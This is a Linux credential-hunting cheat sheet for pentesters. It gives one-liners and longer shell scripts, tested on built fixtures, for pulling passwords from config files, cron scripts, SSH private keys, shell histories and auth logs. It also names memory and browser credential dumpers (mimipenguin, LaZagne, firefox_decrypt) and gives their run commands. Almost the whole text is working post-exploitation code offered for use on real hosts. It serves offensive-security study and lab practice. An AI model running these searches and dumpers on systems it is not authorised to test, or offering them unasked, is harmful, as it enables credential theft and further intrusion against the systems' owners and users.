Credential Hunting in Linux

Files

# Configuration Files

# Find configuration files by extension. The pattern is quoted so the shell does not
# expand *.conf against the current directory before find ever sees it.
for l in .conf .config .cnf; do echo -e "\nFile extension: $l"; find / -type f -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done

# Search user/password/pass strings in configuration files (case-insensitive).
# The second grep drops only commented lines; filtering on "#" anywhere would also
# hide a line like  password = abc#123
for i in $(find / -type f -name "*.cnf" 2>/dev/null | grep -v "doc\|lib"); do echo -e "\nFile: $i"; grep -i "user\|password\|pass" "$i" 2>/dev/null | grep -v "^\s*#"; done

# Databases

# Find database files (.sql dumps, .db/.mdb/.ldb, .db-wal, ...). Most of these are
# binary: inspect them with strings or sqlite3, not cat.
for l in .sql .db ".*db" ".db*"; do echo -e "\nDB File extension: $l"; find / -type f -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done

# Notes
# The parentheses matter: without them -type f applies only to the *.txt branch and
# every extension-less directory under /home gets listed as well.
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \)

# Scripts

# Find scripts with different extensions
for l in .py .pyc .pl .go .jar .c .sh; do echo -e "\nFile extension: $l"; find / -type f -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share"; done
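The same search as the loops above, written for this page as an added example rather than taken from it: quoted patterns, whole-tree pruning instead of grep -v, and commented lines dropped before you read the output. The extension lists, the keyword list and the fixture tree it runs against are assumptions made for the example; on a real host you would call `hunt_creds /` and `list_by_ext / "$DB_EXT"`.

```shell
#!/bin/sh
# Added example, written for this page (not the page's own one-liners): the same
# "find by extension, grep for user/pass" search with quoted patterns, whole-tree
# pruning instead of grep -v, and commented lines dropped. The extension lists,
# keyword list and the fixture tree are assumptions; on a real host run
#   hunt_creds /            and      list_by_ext / "$DB_EXT"
export LC_ALL=C

# Config and script files get grepped; database files are only listed, because
# .db/.sqlite files are binary (use strings or sqlite3 on them).
CONF_EXT=".conf .config .cnf .ini .env .yml .yaml .xml .json"
SCRIPT_EXT=".py .pl .go .c .sh .php"
DB_EXT=".sql .db .*db .db*"
# Credential keywords (grep -i makes them case-insensitive)
CRED_RE='user\|pass\|pwd\|secret\|token\|api_key\|apikey'

list_by_ext() {
    # $1 = root, $2 = space-separated extension list. -prune skips whole trees
    # (the page's grep -v "lib\|share\|doc" list) rather than walking them.
    root=$1; exts=$2
    set -f                           # keep the shell from expanding .db* itself
    for ext in $exts; do
        find "$root" \( -path '*/lib' -o -path '*/lib64' -o -path '*/share' -o -path '*/doc' \
            -o -path '*/fonts' -o -path '*/headers' -o -path '*/man' \
            -o -path '*/proc' -o -path '*/sys' \) -prune \
            -o -type f -name "*$ext" -print 2>/dev/null
    done | sort -u
    set +f
    return 0
}

hunt_creds() {
    # $1 = root. Prints path:line:text for credential-looking lines in config and
    # script files, minus lines that are comments (#, ; or //) in the usual formats.
    list_by_ext "$1" "$CONF_EXT $SCRIPT_EXT" | while IFS= read -r f; do
        grep -niH "$CRED_RE" "$f" 2>/dev/null \
          | grep -v '^[^:]*:[0-9]*:[[:space:]]*\(#\|;\|//\)'
    done
    return 0
}

# --- constructed fixture tree (no real credentials) ---------------------------
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
mkdir -p "$FIXTURE/etc/mysql" "$FIXTURE/opt/app" "$FIXTURE/usr/share/doc/app" "$FIXTURE/var/lib/app"
cat > "$FIXTURE/etc/mysql/my.cnf" <<'EOF'
[client]
# password = commented-out-value
user = appuser
password = S3cr3tDbPass
EOF
cat > "$FIXTURE/opt/app/backup.sh" <<'EOF'
#!/bin/sh
API_TOKEN="tok_constructed_example"
mysqldump -u root -p"$DB_PASS" app > /tmp/app.sql
EOF
printf 'password = should-be-pruned\n' > "$FIXTURE/usr/share/doc/app/sample.conf"
printf 'CREATE TABLE users (name text, pass text);\n' > "$FIXTURE/var/lib/app/schema.sql"
printf 'SQLite format 3\0' > "$FIXTURE/opt/app/app.db"

hunt_creds "$FIXTURE"
printf '%s\n' '--- database files ---'
list_by_ext "$FIXTURE" "$DB_EXT"
```

Against the fixture this prints the two live lines from my.cnf and the two from backup.sh, but neither the commented-out password nor the sample under /usr/share/doc, and lists only app.db (schema.sql sits under a pruned lib directory, which is exactly the trade-off the page's grep -v "lib" makes: fast, but /var/lib is skipped too).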

Cronjobs

# Find scheduled cron jobs (system-wide: /etc/crontab and the /etc/cron.* directories)
cat /etc/crontab

ls -la /etc/cron.*/
# Per-user crontabs live in /var/spool/cron/crontabs/ and are readable by root only;
# crontab -l shows the current user's own entries.
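Listing the crontab is only half the job: the password is usually not in the crontab line but in the backup or sync script it runs. The following is an added example written for this page, not code from it. It parses crontab files the way cron does (system files carry a user column, per-user spool files do not), pulls out each command, and follows every absolute path in it to a readable script, reporting credential-looking lines in both. The crontab, the scripts and the keyword list are a constructed fixture; on a real host you would point it at /etc/crontab, /etc/cron.d/* (kind system) and, as root, /var/spool/cron/crontabs/* (kind user).

```shell
#!/bin/sh
# Added example (not from the page): parse crontab files the way cron does and
# follow each scheduled command to the script it runs, because backup and sync
# jobs are where database and API passwords usually end up hard-coded. The
# crontab and scripts below are a constructed fixture; on a real host run
#   hunt_cron_creds /etc/crontab system
#   for f in /etc/cron.d/*; do hunt_cron_creds "$f" system; done
#   for f in /var/spool/cron/crontabs/*; do hunt_cron_creds "$f" user; done   # root only
CRED_RE='pass\|pwd\|secret\|token\|api_key\|apikey'

cron_commands() {
    # $1 = crontab file, $2 = "system" (/etc/crontab and /etc/cron.d/* carry a user
    # column) or "user" (per-user spool files do not). Prints one command per line,
    # skipping comments, blank lines and SHELL=/PATH=/MAILTO= assignments.
    awk -v kind="$2" '
        /^[ \t]*(#|$)/ { next }
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        {
            skip = ($1 ~ /^@/) ? 1 : 5           # @reboot/@daily vs m h dom mon dow
            if (kind == "system") skip++         # the user column
            cmd = ""
            for (i = skip + 1; i <= NF; i++) cmd = cmd (i > skip + 1 ? " " : "") $i
            print cmd
        }' "$1"
    return 0
}

hunt_cron_creds() {
    # $1 = crontab file, $2 = kind. Reports credential-looking text both in the
    # command line itself (e.g. --password, -pSecret, --token) and inside every
    # absolute path it references that is a readable file.
    cron_commands "$1" "$2" | while IFS= read -r cmd; do
        printf 'CMD %s\n' "$cmd" | grep -i "$CRED_RE"
        set -f                                   # no glob expansion of tokens like *
        for tok in $cmd; do
            case $tok in
                /*) [ -f "$tok" ] && grep -niH "$CRED_RE" "$tok" 2>/dev/null \
                        | grep -v '^[^:]*:[0-9]*:[[:space:]]*#' ;;
            esac
        done
        set +f
    done
    return 0
}

# --- constructed fixture ------------------------------------------------------
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
mkdir -p "$FIXTURE/etc" "$FIXTURE/opt/backup" "$FIXTURE/opt/app"
cat > "$FIXTURE/etc/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
30 2    * * *   root    $FIXTURE/opt/backup/db_backup.sh >> /var/log/backup.log 2>&1
@reboot         appuser $FIXTURE/opt/app/start.sh --token tok_constructed
EOF
cat > "$FIXTURE/opt/backup/db_backup.sh" <<'EOF'
#!/bin/sh
# old: DB_PASS='Retired1!'
DB_PASS='Cr0nB4ckup!'
mysqldump -u backup -p"$DB_PASS" shop | gzip > /srv/backups/shop.sql.gz
EOF
printf '#!/bin/sh\nexec /usr/bin/app "$@"\n' > "$FIXTURE/opt/app/start.sh"

hunt_cron_creds "$FIXTURE/etc/crontab" system
```

The run-parts line produces nothing (no keyword, and /etc/cron.hourly is a directory), the backup job yields the two live DB_PASS lines from its script but not the commented-out old one, and the @reboot job is reported from the crontab line itself because the token is passed as an argument.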

SSH Keys

# SSH Private Keys. The ":1:" filter keeps only hits on line 1, i.e. stand-alone key
# files (":1" alone would also pass lines 10, 11, 123 ...). Drop the filter to catch
# keys pasted into scripts, notes or config files, and add /root, /etc/ssh and /opt
# when you have the rights to read them.
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1:"

# SSH Public Keys and authorized_keys (ssh-rsa alone misses ed25519 and ECDSA keys)
grep -rnw "ssh-rsa\|ssh-ed25519\|ecdsa-sha2-nistp256" /home/* 2>/dev/null | grep ":1:"
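Finding a key is only useful if you know whether it is usable as it is. This added example, written for this page rather than taken from it, searches a whole tree for private-key headers (so a key embedded in a deploy script is found as well as ~/.ssh/id_rsa) and classifies each one as unencrypted or passphrase-protected, for both the legacy PEM format (Proc-Type: 4,ENCRYPTED) and the openssh-key-v1 container, whose cipher name is "none" when there is no passphrase. The key files it runs against are constructed header-only stand-ins, not real keys, and the directory layout is an assumption; on a real host you would run `find_private_keys /home` or `find_private_keys /`.

```shell
#!/bin/sh
# Added example (not from the page): find private keys anywhere in a tree, not only
# at line 1 of files under /home, and tell unencrypted keys (usable as-is) from
# passphrase-protected ones (convert with ssh2john and crack with john). The key
# files below are constructed header-only stand-ins, not real keys; the directory
# layout is assumed.

ssh_key_status() {
    # $1 = file. Prints pem-unencrypted | pem-encrypted | openssh-unencrypted |
    # openssh-encrypted | openssh-unreadable | not-a-private-key.
    f=$1
    if ! grep -q 'PRIVATE KEY-----' "$f" 2>/dev/null; then
        echo not-a-private-key; return 0
    fi
    if grep -q -e '-----BEGIN OPENSSH PRIVATE KEY-----' "$f"; then
        # openssh-key-v1 container: magic, then length-prefixed cipher and kdf names.
        # Cipher "none" means no passphrase; anything else (aes256-ctr + bcrypt) is encrypted.
        hdr=$(sed -n '/^-----BEGIN OPENSSH/,/^-----END OPENSSH/p' "$f" | grep -v -e '^-----' \
              | base64 -d 2>/dev/null | head -c 64 | tr -c '[:print:]' '.')
        case $hdr in
            openssh-key-v1.....none*) echo openssh-unencrypted ;;
            openssh-key-v1*)          echo openssh-encrypted ;;
            *)                        echo openssh-unreadable ;;
        esac
    elif grep -q -e '-----BEGIN ENCRYPTED PRIVATE KEY-----' -e '^Proc-Type: 4,ENCRYPTED' "$f"; then
        echo pem-encrypted              # PKCS#8 encrypted, or legacy PEM with DEK-Info
    else
        echo pem-unencrypted            # legacy RSA/DSA/EC PEM or plain PKCS#8
    fi
    return 0
}

find_private_keys() {
    # $1 = root. One line per file: <status> <path>. Small files only, /proc and /sys skipped.
    find "$1" \( -path '*/proc' -o -path '*/sys' \) -prune -o -type f -size -256k \
        -exec grep -l 'PRIVATE KEY-----' {} + 2>/dev/null | sort | while IFS= read -r f; do
        printf '%s %s\n' "$(ssh_key_status "$f")" "$f"
    done
    return 0
}

mk_openssh_fixture() {
    # $1 = output file, $2 = cipher, $3 = kdf. Writes only the first bytes of an
    # openssh-key-v1 container (magic + cipher + kdf) in the usual PEM wrapper:
    # enough for the status check above, not a loadable key.
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        {
            printf 'openssh-key-v1\0'
            printf "\\0\\0\\0\\$(printf '%03o' "${#2}")%s" "$2"   # uint32 length + name
            printf "\\0\\0\\0\\$(printf '%03o' "${#3}")%s" "$3"
        } | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1"
}

# --- constructed fixture ------------------------------------------------------
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
mkdir -p "$FIXTURE/home/dev/.ssh" "$FIXTURE/opt/deploy"
printf -- '-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedbody\n-----END RSA PRIVATE KEY-----\n' \
    > "$FIXTURE/home/dev/.ssh/id_rsa"
printf -- '-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nconstructedbody\n-----END RSA PRIVATE KEY-----\n' \
    > "$FIXTURE/home/dev/.ssh/id_rsa_work"
mk_openssh_fixture "$FIXTURE/home/dev/.ssh/id_ed25519" none none
echo 'gitlab.example ssh-ed25519 AAAAC3constructed' > "$FIXTURE/home/dev/.ssh/known_hosts"
# a passphrase-protected key embedded in a deploy script: missed by grep ':1'
mk_openssh_fixture "$FIXTURE/opt/deploy/.key" aes256-ctr bcrypt
{ echo '#!/bin/sh'; echo 'cat > /tmp/deploy_key <<KEY'; cat "$FIXTURE/opt/deploy/.key"; echo 'KEY'; } \
    > "$FIXTURE/opt/deploy/deploy.sh"
rm "$FIXTURE/opt/deploy/.key"

find_private_keys "$FIXTURE"
```

Four files are reported: the plain PEM key and the ed25519 key as unencrypted, the work key as pem-encrypted, and the key buried in deploy.sh (line 3, not line 1) as openssh-encrypted; known_hosts is not a private key and is not listed.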

History

# Bash history. The glob .bash* also pulls in .bashrc and .bash_logout, so name the
# file; include /root when you can read it.
tail -n5 /home/*/.bash_history /root/.bash_history 2>/dev/null
# Other shells and tools keep their own history files, which are just as interesting:
# .zsh_history, .mysql_history, .psql_history, .python_history, .viminfo
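The last five lines are rarely where the password is. This added example, written for this page and not part of it, greps every history file under a tree for commands that carried a secret inline: `mysql -pSecret`, `sshpass -p`, `curl -u user:pass`, an exported `*_SECRET_*`/`*_TOKEN*` variable, credentials in a clone URL, `echo pass | sudo -S`, and `IDENTIFIED BY` in a MySQL history. The history files and the regex are constructed for the example; on a real host you would run `scan_all_history /home` (or `/` as root), and extend the regex for the tools in use there.

```shell
#!/bin/sh
# Added example (not from the page): rather than tailing the last five lines,
# grep every shell and tool history file for commands that carried a secret on
# the command line. The history files below are a constructed fixture; the
# regex is a starting list, extend it for the tools you meet.
export LC_ALL=C

# ERE, used with grep -i. Each alternative is one way secrets get typed inline.
CRED_CMD_RE='(mysql|mariadb|mysqldump).* -p[^ ]|sshpass .*-p|curl .*(-u|--user) [^ ]*:|(^| )export .*(PASS|PWD|SECRET|TOKEN|KEY)[A-Z_]*=|https?://[^ /:]+:[^ /@]+@|-pass(in|out)? pass:|--password[= ]|[|] *sudo -S|smbclient .*%|ldapsearch .* -w |zip .* -P |7z .* -p[^ ]|identified by '

scan_history() {
    # $1 = history file. Prints file:line:command for each hit.
    grep -niHE "$CRED_CMD_RE" "$1" 2>/dev/null
    return 0
}

scan_all_history() {
    # $1 = root. bash and zsh keep .*_history; so do mysql, psql, python and others,
    # which is why the search is not limited to .bash_history.
    find "$1" -type f \( -name '.*_history' -o -name '.viminfo' -o -name '.lesshst' \) 2>/dev/null \
        | sort | while IFS= read -r f; do scan_history "$f"; done
    return 0
}

# --- constructed fixture ------------------------------------------------------
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
mkdir -p "$FIXTURE/home/alice"
cat > "$FIXTURE/home/alice/.bash_history" <<'EOF'
ls -la
mysql -u root -pSup3rS3cret shop
sshpass -p 'Sw0rdfish' ssh deploy@10.10.10.5
curl -u admin:Hunter2 http://intranet/api/status
export AWS_SECRET_ACCESS_KEY=constructedexamplekey
mysql -u root -p
git clone https://bob:ghp_constructed@github.com/org/repo.git
vim /etc/hosts
echo 'Pa55w0rd' | sudo -S systemctl restart nginx
EOF
cat > "$FIXTURE/home/alice/.mysql_history" <<'EOF'
SELECT * FROM users;
CREATE USER 'app'@'%' IDENTIFIED BY 'AppPw123';
EOF

scan_all_history "$FIXTURE"
```

Six of the nine bash lines are reported; `mysql -u root -p` (password prompted, not typed) and `vim /etc/hosts` are not, and the CREATE USER line from the MySQL history is the seventh hit.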

Logs

# Searching for interesting information in logs. The pattern is kept in a variable so
# it is not repeated; directories under /var/log are skipped and file names are quoted.
# Rotated logs (*.gz) need zgrep instead of grep.
PATTERN="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs"
for i in /var/log/*; do [ -f "$i" ] || continue; if grep -q "$PATTERN" "$i" 2>/dev/null; then echo -e "\n#### Log file: $i"; grep "$PATTERN" "$i" 2>/dev/null; fi; done

Many different logs exist on the system. Which ones are present depends on the distribution and the installed applications, and a systemd host may keep most of this only in the journal (journalctl -u ssh, journalctl _COMM=sudo), but these are the most important ones:

Log File              Description
/var/log/messages     Generic system activity logs (RedHat/CentOS).
/var/log/syslog       Generic system activity logs (Debian/Ubuntu).
/var/log/auth.log     All authentication related logs (Debian/Ubuntu): sshd, sudo, su, PAM.
/var/log/secure       All authentication related logs (RedHat/CentOS).
/var/log/boot.log     Boot information.
/var/log/dmesg        Hardware and driver messages from the kernel ring buffer.
/var/log/kern.log     Kernel warnings, errors and messages.
/var/log/faillog      Failed login attempts. Binary: read it with the faillog command (and /var/log/btmp with lastb).
/var/log/cron         Cron job execution (RedHat/CentOS; Debian writes cron messages to syslog).
/var/log/mail.log     Mail server logs.
/var/log/httpd        Apache logs (a directory; /var/log/apache2 on Debian/Ubuntu).
/var/log/mysqld.log   MySQL server logs (/var/log/mysql/error.log on Debian/Ubuntu).
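The broad keyword grep above returns hundreds of lines on a busy host. This added example, written for this page and not part of it, shows the three extractions from auth.log / secure that actually turn into credentials or targets: usernames sshd rejected that look like a password typed into the login prompt by mistake, sudo COMMAND= lines that carry a secret as an argument (sudo logs the full argv), and who logs in from where, which is where a recovered password gets tried next. The log lines are a constructed fixture; on a real host pass /var/log/auth.log or /var/log/secure, or the output of `journalctl -u ssh -o short` (`-u sshd` on RedHat) and `journalctl _COMM=sudo -o short`, which use the same line format.

```shell
#!/bin/sh
# Added example (not from the page): three targeted extractions over auth.log /
# secure instead of the broad keyword grep. The log below is a constructed
# fixture; on a real host pass /var/log/auth.log, /var/log/secure or journalctl
# output in the default (short) format.
export LC_ALL=C

invalid_user_names() {
    # $1 = log file. Distinct "Invalid user X" values with a count. A value with
    # characters outside the usual username alphabet (uppercase, !, @ ...) was most
    # likely a password entered in the username field: try it against real accounts.
    sed -n 's/.*sshd\[[0-9]*\]: Invalid user \(.*\) from [0-9a-f.:]* port [0-9]*.*/\1/p' "$1" \
      | sort | uniq -c | sort -rn | while read -r n name; do
        case $name in
            *[![:lower:][:digit:]._-]*) flag=password-like ;;
            *)                         flag=username ;;
        esac
        printf '%s %s %s\n' "$n" "$name" "$flag"
    done
    return 0
}

sudo_commands_with_secrets() {
    # sudo logs the complete argv. Anything given as -pSecret, --password=...,
    # -pass pass:..., sshpass -p ... or ldapsearch -w ... is in here in cleartext.
    # " -p[^ ]" also catches things like "find -print": review the hits by hand.
    grep 'COMMAND=' "$1" 2>/dev/null \
      | grep -iE -e ' -p[^ ]|--password|-pass(in|out)? pass:|sshpass| -w [^ ]'
    return 0
}

accepted_logins() {
    # "<user> <method> <source-ip>" with a count: the users that really log in and
    # from which hosts, so a password or key found here can be tried where it is used.
    sed -n 's/.*sshd\[[0-9]*\]: Accepted \([a-z]*\) for \([^ ]*\) from \([0-9a-f.:]*\) port.*/\2 \1 \3/p' "$1" \
      | sort | uniq -c
    return 0
}

# --- constructed fixture (auth.log style lines, invented hosts and users) ------
LOGFILE=$(mktemp)
trap 'rm -f "$LOGFILE"' EXIT
cat > "$LOGFILE" <<'EOF'
Jan 14 03:12:07 web01 sshd[2231]: Invalid user Sup3rS3cret! from 10.10.14.3 port 51122
Jan 14 03:12:07 web01 sshd[2231]: Failed password for invalid user Sup3rS3cret! from 10.10.14.3 port 51122 ssh2
Jan 14 03:12:15 web01 sshd[2235]: Accepted password for alice from 10.10.14.3 port 51130 ssh2
Jan 14 03:12:15 web01 sshd[2235]: pam_unix(sshd:session): session opened for user alice by (uid=0)
Jan 14 03:14:02 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/mysql -u root -pSup3rS3cret shop
Jan 14 03:20:41 web01 sshd[2260]: Invalid user admin from 10.10.14.9 port 40022
Jan 14 03:20:44 web01 sshd[2260]: Failed password for invalid user admin from 10.10.14.9 port 40022 ssh2
Jan 14 03:25:10 web01 sshd[2281]: Accepted publickey for deploy from 10.10.14.3 port 51200 ssh2: ED25519 SHA256:constructed
EOF

printf '%s\n' '== invalid user names =='; invalid_user_names "$LOGFILE"
printf '%s\n' '== sudo commands carrying secrets =='; sudo_commands_with_secrets "$LOGFILE"
printf '%s\n' '== accepted logins =='; accepted_logins "$LOGFILE"
```

On the fixture, "Sup3rS3cret!" is flagged password-like while "admin" is a plain username (a brute-force attempt, not a leak), the sudo line exposes the same string as a mysql -p argument, and the accepted-login summary shows alice (password) and deploy (publickey) both coming from 10.10.14.3.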

Memory and Cache

# Download - <https://github.com/huntergregal/mimipenguin>

# Memory - Mimipenguin. Needs root: it reads the memory of a fixed set of target
# processes (gnome-keyring, vsftpd, apache2, sshd, ...), so no output on a minimal
# server is normal rather than a failure.
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

# Lazagne - <https://github.com/AlessandroZ/LaZagne>
# Memory - Lazagne. "all" runs every module; run as root to reach other users'
# stores. Older releases need python2.7 instead of python3.
sudo python3 laZagne.py all

Browsers

# Firefox Stored Credentials. The profile directory name (1bplpd86 below) is random
# per install; profiles.ini in ~/.mozilla/firefox names the default profile.
ls -l ~/.mozilla/firefox/ | grep default
jq . ~/.mozilla/firefox/1bplpd86.default-release/logins.json

# Decrypting Firefox Credentials. Needs logins.json together with key4.db from the
# same profile and prompts for the master password if one is set; the profile
# directory can also be given as an argument.
# Decrypt tool - <https://github.com/unode/firefox_decrypt>
python3.9 firefox_decrypt.py

# Lazagne
# LaZagne can also return results if the user has used a supported browser.
python3 laZagne.py browsers

Last updated 2 years ago